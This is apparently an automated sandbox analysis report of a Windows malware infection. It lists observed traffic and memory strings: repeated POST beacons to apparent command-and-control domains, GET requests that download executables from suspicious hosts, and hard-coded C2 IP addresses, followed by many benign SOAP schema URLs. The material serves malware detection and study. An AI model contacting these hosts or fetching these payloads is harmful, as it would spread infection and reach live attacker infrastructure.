                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhtdbo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pcfbatp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yytvtctaug.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmpxg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxxtbccl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqmves.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xhxsjp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://skgfhxg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qlaiw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qopqxs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cqutypagk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ahkpouvwup.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gxtcaqi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hrsmjturj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jwmtctjvqt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amqeeswq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /crp.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: f0616068.xsph.ru
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gnnwam.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwgkv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fleiunffw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: vk.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ouwak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gyuyyjn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: natribu.org
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sxetmnxgu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: natribu.org
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://whjllmlg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/2972_1641266367_4755.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jjrpdilcbv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ersxoxafng.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amogohuigotuli.at/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 423Host: amogohuigotuli.at
                      Source: C:\Windows\explorer.exeDNS query: name: bit.ly
                      Source: C:\Windows\explorer.exeDNS query: name: bitly.com
                      Source: C:\Windows\explorer.exeDNS query: name: bit.ly
                      Source: C:\Windows\explorer.exeDNS query: name: bit.ly
                      Source: global trafficTCP traffic: 192.168.2.5:49793 -> 185.7.214.171:8080
                      Source: global trafficTCP traffic: 192.168.2.5:49846 -> 86.107.197.138:38133
                      Source: unknownNetwork traffic detected: IP country count 12
                      Source: global trafficTCP traffic: 192.168.2.5:49813 -> 40.93.207.1:25
                      Source: 4187.exe, 0000002A.00000002.596141885.0000000002726000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.41/
                      Source: 4187.exe, 0000002A.00000002.553183370.0000000000AC8000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.41/capibar
                      Source: 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.41/capibarC
                      Source: 4187.exe, 0000002A.00000002.553183370.0000000000AC8000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.53/capibar
                      Source: 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.53/capibar0
                      Source: 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://194219.236.148/
                      Source: 4187.exe, 0000002A.00000002.596141885.0000000002726000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.148/
                      Source: 4187.exe, 0000002A.00000002.553213817.0000000000ADD000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.553183370.0000000000AC8000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.148/capibar
                      Source: 4187.exe, 0000002A.00000002.596141885.0000000002726000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.148/capibarN
                      Source: 4187.exe, 0000002A.00000002.602443827.0000000002755000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.148/capibarg
                      Source: 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.148/capibarl
                      Source: 4187.exe, 0000002A.00000002.596141885.0000000002726000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.18/3
                      Source: 4187.exe, 0000002A.00000002.553183370.0000000000AC8000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.18/capibar
                      Source: 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.18/capibarl
                      Source: svchost.exe, 00000004.00000002.594562074.0000020254C62000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000004.00000002.594562074.0000020254C62000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: CBA.exe, 00000021.00000002.632885407.0000000003540000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp, CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id1
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id10
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id11
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id12
